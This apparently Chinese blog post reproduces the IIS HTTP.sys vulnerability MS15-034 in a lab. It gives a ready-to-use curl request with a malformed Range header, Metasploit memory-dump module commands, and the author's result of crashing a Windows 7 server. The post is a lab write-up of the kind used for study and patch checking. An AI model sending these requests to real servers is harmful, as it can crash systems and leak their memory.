HTTP.SYS远程代码执行漏洞(MS15-034)

目录

 

简介

影响范围

危害

漏洞复现

win2008 r2

换成win7

利用msf


简介

漏洞编号:CVE-2015-1635(MS15-034 )

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,
当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 
成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

影响范围

任何安装了微软IIS 6.0以上的
    Win Server 2008 R2、 
    Win Server 2012、
    Win Server 2012 R2、
    Win 7、
    Win 8、
    Win 8.1

危害

(1)远程读取IIS服务器的内存数据,
(2)使服务器系统蓝屏崩溃。

漏洞复现

win2008 r2

环境:win2008 r2 ,iis7.5

(一)利用curl

curl -v IP -H "Host:irrelevant" -H "Range: bytes=0-18446744073709551615"

用的时候仅仅修改IP就行;这个IP可以是:纯IP、IP加端口号、域名。

如果服务器存在HTTP.SYS远程代码执行漏洞,那么响应状态应该有:

 HTTP/1.1 416 Requested Range Not Satisfiable

如果服务器打上了补丁,那么响应状态应该是:

HTTP Error 400. The request has an invalid header name.

  进行发包,这里并没有成功,不存在这个漏洞

 

换成win7

win7安装iis服务 https://jingyan.baidu.com/article/219f4bf723bcb2de442d38ed.html

web界面如下

发送数据包,漏洞存在

利用msf

search ms 15-034
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts xxx
run

但是这里的状态码并不是  HTTP/1.1 416 Requested Range Not Satisfiable,但还是成功了

服务器瞬间蓝屏然后重启了

                                                                                                                                                                                                —— 心,若没有栖息的地方,到哪里都是流浪

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值